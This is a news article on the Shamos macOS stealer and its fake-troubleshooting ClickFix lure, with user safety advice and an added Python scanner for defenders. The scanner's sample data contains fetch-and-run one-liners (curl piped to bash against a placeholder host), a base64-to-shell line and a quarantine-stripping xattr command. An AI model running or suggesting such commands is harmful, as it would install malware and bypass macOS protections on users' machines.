Shamos Malware Deceives Mac Users with Phony Fixes


A new malware campaign, Shamos, is targeting Mac users by exploiting fake troubleshooting websites to install malicious software through deceptive terminal commands.

A dangerous new malware campaign is on the rise, specifically targeting Mac users globally. Security researchers at CrowdStrike have identified Shamos, a new variant of the Atomic macOS Stealer (AMOS), developed by a cybercriminal group known as COOKIE SPIDER.

This attack employs ClickFix tactics, where victims searching for Mac troubleshooting assistance are lured to counterfeit websites or GitHub repositories. These fraudulent sites trick users into copying and pasting a one-line command into Terminal, which is purportedly meant to fix an error. Instead of resolving issues, this command silently downloads Shamos, bypassing macOS Gatekeeper protections and installing the malware.

Once installed, Shamos begins to search for sensitive information, including Apple Notes, Keychain items, browser passwords, and even cryptocurrency wallets. The stolen data is compressed and sent directly to the attackers, often alongside additional malware such as botnet modules or counterfeit Ledger wallet applications.

Cybercriminals distribute these deceptive “fixes” through malvertising campaigns and spoofed tech support websites, which often bear names like mac-safer[.]com or rescue-mac[.]com. These sites masquerade as trusted troubleshooting guides and appear prominently in search results for common Mac issues, such as “how to flush resolver cache.”

Victims are encouraged to copy and paste commands that download malicious Bash scripts. These scripts can capture the user’s password, remove file protections, and launch Shamos. With a persistence mechanism in place, the malware relaunches each time the system restarts, maintaining control long after the initial infection.

To avoid falling victim to Shamos and similar threats, users should take proactive measures. While copy-pasting commands into Terminal may seem like a quick fix, it is also one of the easiest ways for attackers to circumvent Apple’s built-in protections. If you encounter a command on a website, forum, or GitHub repository, do not execute it unless you fully understand its function. Instead, verify the command with Apple’s official support site or the Apple Community forums, where experienced users and moderators can confirm safe troubleshooting steps.

Hackers are aware that when a Mac experiences issues, users often seek quick solutions. This urgency is exploited through sponsored ads that push fake troubleshooting websites higher in search results. Clicking on the top link may seem natural, but it could lead to a trap. It is advisable to stick with trusted sources like Apple Support or scroll past the ads to locate legitimate guides.

While GitHub is a valuable resource for developers, it has also become a hotspot for malicious repositories that mimic legitimate software. Attackers frequently clone popular applications or tools, embedding malware within them. Before downloading anything, users should check the publisher’s name, the number of stars, and the activity history. If the account appears suspicious, inactive, or newly created, it is best to avoid it.

Mac malware is evolving rapidly, and Apple’s built-in security features cannot catch everything. Utilizing a robust antivirus solution adds another layer of defense by scanning downloads, blocking malicious scripts, and detecting suspicious behavior in real time. Some security tools can even identify the one-line Terminal commands used by Shamos before they can inflict damage.
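As an added example (not code from the article or from CrowdStrike), here is a small indicator scanner of the kind the detection claim above alludes to, run over the copy-paste one-liners described earlier; the indicator names, regexes, sample history lines and the placeholder domain are all constructed here.

```python
"""Flag ClickFix-style one-liners in shell history or command-line telemetry.
Added example, not the article's or CrowdStrike's code; all names, regexes
and sample lines below are constructed."""
import re

# (name, regex) pairs matching the shape of the pasted commands the article
# describes: a download piped straight into a shell, a shell running a fetched
# script via command substitution, an obfuscated payload decoded and executed,
# and the quarantine attribute stripped so Gatekeeper never inspects the file.
INDICATORS = [
    ("pipe_to_shell",
     re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")),
    ("exec_substitution",
     re.compile(r"\b(?:ba|z)?sh\s+-c\s+[\"']?\$\(\s*(?:curl|wget)\b")),
    ("decode_to_shell",
     re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b[^|\n]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")),
    ("quarantine_removal",
     re.compile(r"\bxattr\b.*(?:\s-c\b|com\.apple\.quarantine)")),
]

def classify(command: str) -> list[str]:
    """Return the names of every indicator that matches one command line."""
    return [name for name, rx in INDICATORS if rx.search(command)]

def scan_history(lines: list[str]) -> list[tuple[int, str, list[str]]]:
    """Return (line_number, command, indicators) for each flagged line."""
    flagged = []
    for n, cmd in enumerate(lines, start=1):
        hits = classify(cmd)
        if hits:
            flagged.append((n, cmd, hits))
    return flagged

# Constructed sample history: two legitimate commands (the first is the
# documented way to flush the macOS resolver cache) followed by four
# ClickFix-style one-liners. The domain is a placeholder, not a real indicator.
SAMPLE_HISTORY = [
    "sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder",
    "ls -la ~/Library/LaunchAgents",
    "curl -fsSL https://mac-fix.example/fix.sh | bash",
    'bash -c "$(curl -fsSL https://mac-fix.example/fix.sh)"',
    "echo ZWNobyBoaQ== | base64 -d | sh",
    "xattr -c ~/Downloads/Fix.app",
]

if __name__ == "__main__":
    for n, cmd, hits in scan_history(SAMPLE_HISTORY):
        print(f"line {n}: {', '.join(hits)}  <- {cmd}")
```

The legitimate resolver-flush command is deliberately included so the rules can be checked for false positives on the very fix that the spoofed sites advertise.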

As Shamos is designed to steal personal information and transmit it to cybercriminals, reducing your online footprint can help mitigate the potential fallout. A personal data removal service can scan data broker sites and eliminate your exposed information, making it more difficult for attackers to resell or exploit it following a breach. Although this measure won’t prevent malware from stealing data already on your Mac, it does provide an additional layer of protection by minimizing the data available for criminals to use against you.

Apple regularly patches vulnerabilities in macOS that malware attempts to exploit. Keeping your system updated is crucial for closing the doors that attackers rely on. Enabling automatic updates ensures that your Mac receives the latest patches as soon as they become available. Coupled with good digital hygiene, such as avoiding dubious downloads, this practice significantly lowers the risk of infection.

Cybercriminals understand that when a Mac malfunctions, users are likely to seek immediate solutions. Shamos capitalizes on this urgency by disguising itself as helpful assistance. Staying safe requires users to slow down before copying, pasting, or downloading anything. If something seems off, it probably is.

Should Apple be doing more to protect Mac users from evolving threats like Shamos? Share your thoughts by reaching out to us at Cyberguy.com/Contact.

Source: Original article
